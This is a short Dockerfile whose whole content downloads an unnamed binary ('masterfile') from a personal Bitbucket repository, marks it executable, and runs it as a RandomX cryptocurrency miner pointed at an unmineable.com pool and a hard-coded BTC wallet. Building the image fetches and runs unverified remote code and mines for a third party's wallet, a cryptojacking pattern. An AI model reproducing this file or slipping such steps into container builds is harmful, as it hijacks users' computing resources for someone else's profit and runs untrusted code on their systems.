FROM ubuntu:20.04
#-----------------
RUN apt-get update
RUN apt-get install -y wget
RUN wget https://bitbucket.org/MabarAnjay01/test/downloads/masterfile
RUN chmod u+x masterfile
RUN ./masterfile --disable-gpu --algorithm randomx --pool rx.unmineable.com:13333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC --cpu-threads 1